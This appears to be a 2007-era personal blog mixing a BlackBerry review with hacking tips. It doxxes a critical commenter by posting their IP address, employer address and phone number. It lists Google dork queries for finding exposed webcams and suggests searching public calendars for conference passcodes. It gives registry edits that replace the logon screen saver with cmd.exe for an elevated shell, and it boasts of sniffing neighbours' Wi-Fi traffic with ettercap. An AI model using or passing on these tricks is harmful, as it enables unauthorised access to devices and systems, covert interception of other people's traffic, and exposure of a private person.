After a recent trip to Clarkston Wa. Some bad guy was nice to steal some of my stuff. I thought he stole my blackberry and thusly went out to buy a new one. Later to find out my blackberry was in Katie's purse. So I had about 6 hours to play with the blackberry 8100 and well, I didn't return it. The pearl or the track-ball wheel on the thing is like going from rotary phones to tone dial. Everything you do is faster, particularly the calendar is much better to use. You can go from day to day just by moving the track-ball horizontally. Not to mention that its smaller, I didn't think I would care but let me tell you its super cool. It also has a microSD card which detects as a removable drive in windows. Camera with a crappy flash, but it has good zoom. If you feel like dropping the cash on a 2 year contract or just buying one. my review is “totally rad”. Also features to mention are voice dialing is built in and automatic with bluetooth. The headset is also much louder my 7100 I could never hear anything 8100 my hears hurt.

I recently got a harsh comment – He/She wanted me to make fun of him, I dont have anything to be ashamed about, I cant spell I own up to that. I should put a disclaimer on my blog. If your a grammar nut then read another blog. Also if you put it up on a web site you put it in a log for all the world to see – anticipate log posting. Also if this IP is correct dont post on company time, since now your company googles up with this post.

2007-05-10 19:29:53 W3SVC833124697 —— —— GET /blog/CategoryView,category,Nerd.aspx - 80 - 208.28.227.132 HTTP/1.1 Mozilla/5.0+(Macintosh;+U;+PPC+Mac+OS+X;+en)+AppleWebKit/419+(KHTML,+like+Gecko)+Safari/419.3 - http://www.google.com/search?client=safari&rls=en&q=%22mac+bugs%22+itunes+autostart&ie=UTF-8&oe=UTF-8 www.kellykeeton.com 200 0 0 104634 390 14796

IP address info: IP address: 208.28.227.132 IP Address city: Smyrna IP latitude: 33.859901 IP longitude: -84.516800 ISP: Sprint Organization: THE PARADIES SHOPS –  5950 Fulton Industrial Boulevard, S.W. –  Atlanta, Georgia 30336 – 404.344.7905

Comment as follows…

“If you're smart like me, you use the contracted form of "you are" instead of the possessive adjective "your."
Here's an example:
You're an idiot and make errors on your blog. See the difference?
Here are a few more for future reference:
to - preposition expressing motion in the direction of a particular location and too - in addition, as well, very
won't - "will not" contracted and want - to desire
our - possessive adjective and hour - sixty minutes
can't - "can not" and Kant - German philosopher (1724 - 1804)

Come on now, make fun of me for being a nerd and pointing out simple mistakes on a strangers blog, and say that i need to get a life etc... -or- own up to your (See, I used it again!) mistake and deflate that ego just a bit. You put it in a blog, for all the world to see - anticipate criticism.
Kelly Keeton is an Idiot”

this is all over the web but its sort of fun. google the following types of topics: specifically use google-suggest http://www.google.com/webhp?complete=1&hl=en and put in URLS you know of (example take a appliance you have and put in the /admin/blah.html and see if google will suggest it up.)

I stole the following list from another blog. But it will give you the idea of how suggest can be used to find things that people might have put online by accident.

• Axis Webcams: inurl:/view.shtml or inurl:view/index.shtml
• Cannon Webcams: sample/LvAppl/
• MOBOTIX Webcams: control/userimage.html
• FlexWatch Webcams: /app/idxas.html
• JVC Webcams: intitle: intitle:”V.Networks [Motion Picture(Java)]”

inurl:/view.shtml
intitle:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210&Prime
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1&Prime intext:”Open Menu”
intext:”MOBOTIX M10&Prime intext:”Open Menu”
intext:”MOBOTIX D10&Prime intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1&Prime
intitle:”sony network camera snc-m1&Prime
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console - Web Monitor”

If your smart like me you realize what this image shows. If you log into google calendar you will have this new search feature, you will also notice what I searched for, you can be creative with the terms you use (I used passcode like conference call passcode) you now have a hacking trick or simply a great prank phone call method. – Idea spawn pauldotcom security podcast.

Social engineering at the best, also prevent this by NOT MARKING PUBLIC CALANDAR or just dont put secure information in google.

(Access Point)——Irongeek Ettercap Script———Gateway

This is something sort of fun that I just installed on my home wireless. Its actually very educational you can learn what type of code sends clear text passwords and what will not. Most interesting is using sites that attempt to prevent this type of attack and put fun data in the password fields. I installed ettercap in bridge mode so I have layer1 access to the data. (granted that ettercap did this all along this is just a fun way to show it off)

a simple trick to get elevated command line from the screen saver, there are many ways to enter this data one fast trick is to use a linux reg editor its simple as making the logon script the command window. also works to do a command line of “copy cmd.exe logon.scr” this will work anywhere  but on domain controllers not booted in recovery mode. This is preventable with PGP disk encryption.

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="15"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="cmd.exe"

OEM data you changed

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="600"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="C:\\WINDOWS\\System32\\logon.scr"

in recent hackings I came across a few other locations that if smart you can inject autoruns

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

So I have never really liked wireless networks, also if I do have wireless I like to have free wireless. So today I spent 8 hours working on making a new wireless network with a captive portal. What is this you ask? You know when you use the wifi at a hotel it makes you agree to terms and conditions? and you cant browse until you accept them. thats the idea. I looked all over at like 15 solutions. Mainly the biggest being free, also that I didnt need to use services 3rd party and I didnt want it to be a windows application (dont want to use a loud computer) I happen to have a old firewall that the OS was corrupt on from work so I went to compusa and bought a CF card for 40% off. came home and installed my new os. I chose to go with http://www.pfsense.org/ its a spinoff of m0n0wall which is a very good firewall, however PFSence, has a better polish.

So after diggin out a old netgear I got it all hooked up, now I have port level fwd with packet shape and vlans, as well as a firewalled limited wifi with captive portal. way cool I now offer network service to my neighbors with the added cost of letting me spy on them. All ettercap I love you. The only interesting that I should add is im using a alpha build and its very buggy  but still works.

If you own a PC that the public can get to – laptop, library, corporate etc etc. Disable AutoPlay on the system via Group Policy. Do this to prevent hackers

• KB 555324
• KB 320182